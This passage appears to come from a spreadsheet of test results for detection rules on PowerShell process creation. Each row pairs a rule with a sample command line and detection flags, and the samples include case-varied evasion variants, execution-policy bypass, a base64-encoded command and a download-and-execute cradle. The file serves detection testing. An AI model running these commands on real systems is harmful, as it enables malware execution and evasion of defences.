          <t>powershell.exe -Command "&amp; 'C:\Users\Public\script.ps1'"</t>
        </is>
      </c>
      <c r="F2196" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2196" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2196" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2196" s="43" t="n"/>
      <c r="J2196" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2196" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2197" ht="15.75" customHeight="1" s="42">
      <c r="A2197" s="43" t="n"/>
      <c r="B2197" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C2197" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D2197" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E2197" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "&amp; 'C:\Users\Public\script.ps1'"</t>
        </is>
      </c>
      <c r="F2197" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2197" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2197" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2197" s="43" t="n"/>
      <c r="J2197" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2197" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2198" ht="15.75" customHeight="1" s="42">
      <c r="A2198" s="43" t="n"/>
      <c r="B2198" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C2198" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D2198" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E2198" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMaNd "&amp; 'C:\Users\Public\script.ps1'"</t>
        </is>
      </c>
      <c r="F2198" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2198" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2198" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2198" s="43" t="n"/>
      <c r="J2198" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2198" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2199" ht="15.75" customHeight="1" s="42">
      <c r="A2199" s="43" t="n"/>
      <c r="B2199" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C2199" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D2199" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E2199" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; 'C:\Users\Public\script.ps1'"</t>
        </is>
      </c>
      <c r="F2199" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2199" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2199" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2199" s="43" t="n"/>
      <c r="J2199" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2199" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2200" ht="15.75" customHeight="1" s="42">
      <c r="A2200" s="43" t="n"/>
      <c r="B2200" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C2200" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D2200" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E2200" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; 'C:\Users\Public\script.ps1'"</t>
        </is>
      </c>
      <c r="F2200" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2200" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2200" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2200" s="44" t="n"/>
      <c r="J2200" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2200" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2201" ht="15.75" customHeight="1" s="42">
      <c r="A2201" s="43" t="n"/>
      <c r="B2201" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C2201" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D2201" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E2201" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmanD "&amp; 'C:\Users\Public\script.ps1'"</t>
        </is>
      </c>
      <c r="F2201" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2201" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2201" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2201" s="43" t="n"/>
      <c r="J2201" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2201" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2202" ht="15.75" customHeight="1" s="42">
      <c r="A2202" s="43" t="n"/>
      <c r="B2202" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C2202" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D2202" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E2202" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAND "&amp; 'C:\Users\Public\script.ps1'"</t>
        </is>
      </c>
      <c r="F2202" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2202" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2202" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2202" s="43" t="n"/>
      <c r="J2202" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2202" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2203" ht="15.75" customHeight="1" s="42">
      <c r="A2203" s="43" t="n"/>
      <c r="B2203" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C2203" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D2203" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E2203" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -f "C:\Users""\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F2203" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2203" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2203" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2203" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2203" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2203" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2204" ht="15.75" customHeight="1" s="42">
      <c r="A2204" s="43" t="n"/>
      <c r="B2204" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C2204" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D2204" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E2204" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Ep bypass -File "C:\Users" "\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F2204" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2204" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2204" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2204" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2204" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2204" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2205" ht="15.75" customHeight="1" s="42">
      <c r="A2205" s="43" t="n"/>
      <c r="B2205" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C2205" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D2205" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E2205" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -f "C:\Users" "\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F2205" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2205" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2205" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2205" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2205" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2205" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2206" ht="15.75" customHeight="1" s="42">
      <c r="A2206" s="43" t="n"/>
      <c r="B2206" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C2206" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D2206" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E2206" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -f "C:\Users" "\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F2206" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2206" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2206" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2206" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2206" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2206" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2207" ht="15.75" customHeight="1" s="42">
      <c r="A2207" s="43" t="n"/>
      <c r="B2207" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C2207" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D2207" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E2207" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -file "C:\Users\Default\..\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F2207" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2207" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2207" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2207" s="44" t="n"/>
      <c r="J2207" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2207" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2208" ht="15.75" customHeight="1" s="42">
      <c r="A2208" s="43" t="n"/>
      <c r="B2208" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C2208" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D2208" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E2208" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -fILe "C:\Users\Default\..\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F2208" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2208" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2208" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2208" s="44" t="n"/>
      <c r="J2208" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2208" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2209" ht="15.75" customHeight="1" s="42">
      <c r="A2209" s="43" t="n"/>
      <c r="B2209" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C2209" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D2209" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E2209" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -FILe "C:\Users\Default\..\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F2209" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2209" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2209" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2209" s="44" t="n"/>
      <c r="J2209" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2209" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2210" ht="15.75" customHeight="1" s="42">
      <c r="A2210" s="43" t="n"/>
      <c r="B2210" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C2210" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D2210" s="44" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E2210" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ex Bypass -File script.ps1</t>
        </is>
      </c>
      <c r="F2210" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2210" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2210" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2210" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0)</t>
        </is>
      </c>
      <c r="J2210" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2210" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2211" ht="15.75" customHeight="1" s="42">
      <c r="A2211" s="43" t="n"/>
      <c r="B2211" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C2211" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D2211" s="44" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E2211" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Ex Bypass -FiLe script.ps1</t>
        </is>
      </c>
      <c r="F2211" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2211" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2211" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2211" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0)</t>
        </is>
      </c>
      <c r="J2211" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2211" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2212" ht="15.75" customHeight="1" s="42">
      <c r="A2212" s="43" t="n"/>
      <c r="B2212" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C2212" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D2212" s="44" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E2212" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ex Bypass -filE script.ps1</t>
        </is>
      </c>
      <c r="F2212" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2212" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2212" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2212" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0)</t>
        </is>
      </c>
      <c r="J2212" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2212" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2213" ht="15.75" customHeight="1" s="42">
      <c r="A2213" s="43" t="n"/>
      <c r="B2213" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C2213" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D2213" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E2213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3" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2213" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2213" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2213" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2213" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2213" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2214" ht="15.75" customHeight="1" s="42">
      <c r="A2214" s="43" t="n"/>
      <c r="B2214" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C2214" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D2214" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E2214" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc QQBkAGQALQBQAFMAUwBuAGEAcABpAG4AIABNAGkAYwByAG8AcwBvAGYAdAAuAEUAeABjAGgAYQBuAGcAZQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUwBuAGEAcABJAG4A</t>
        </is>
      </c>
      <c r="F2214" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2214" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2214" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2214" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2214" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2214" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2215" ht="15.75" customHeight="1" s="42">
      <c r="A2215" s="43" t="n"/>
      <c r="B2215" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C2215" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D2215" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E2215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5" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2215" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2215" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2215" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2215" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2215" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2216" ht="15.75" customHeight="1" s="42">
      <c r="A2216" s="43" t="n"/>
      <c r="B2216" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C2216" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D2216" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E2216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6" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2216" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2216" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2216" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2216" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2216" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2217" ht="15.75" customHeight="1" s="42">
      <c r="A2217" s="43" t="n"/>
      <c r="B2217" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C2217" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D2217" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E2217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7" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2217" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2217" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2217" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2217" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2217" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2218" ht="15.75" customHeight="1" s="42">
      <c r="A2218" s="43" t="n"/>
      <c r="B2218" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C2218" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D2218" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E2218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8" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2218" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2218" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2218" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2218" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2218" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2219" ht="15.75" customHeight="1" s="42">
      <c r="A2219" s="43" t="n"/>
      <c r="B2219" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C2219" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D2219" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E2219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2219" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2219" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2219" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2219" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2219" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2219" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2220" ht="15.75" customHeight="1" s="42">
      <c r="A2220" s="43" t="n"/>
      <c r="B2220" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2220" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2220" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2220" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object System.Net.WebClient; IEX $wc.DownloadString('http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F2220" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2220" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2220" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2220" s="4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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2220" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2221" ht="15.75" customHeight="1" s="42">
      <c r="A2221" s="43" t="n"/>
      <c r="B2221" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2221" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2221" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2221" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$wc = New-Object System.Net.WebClient; IEX $wc.DownloadString('http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F2221" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2221" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2221" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2221" s="4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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2221" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2222" ht="15.75" customHeight="1" s="42">
      <c r="A2222" s="43" t="n"/>
      <c r="B2222" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2222" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2222" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2222" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMANd "$wc = New-Object System.Net.WebClient; IEX $wc.DownloadString('http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F2222" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2222" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2222" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2222" s="4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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2222" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2223" ht="15.75" customHeight="1" s="42">
      <c r="A2223" s="43" t="n"/>
      <c r="B2223" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2223" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2223" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2223" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "$wc = New-Object System.Net.WebClient; IEX $wc.DownloadString('http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F2223" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2223" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2223" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2223" s="4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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2223" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2224" ht="15.75" customHeight="1" s="42">
      <c r="A2224" s="43" t="n"/>
      <c r="B2224" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2224" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2224" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
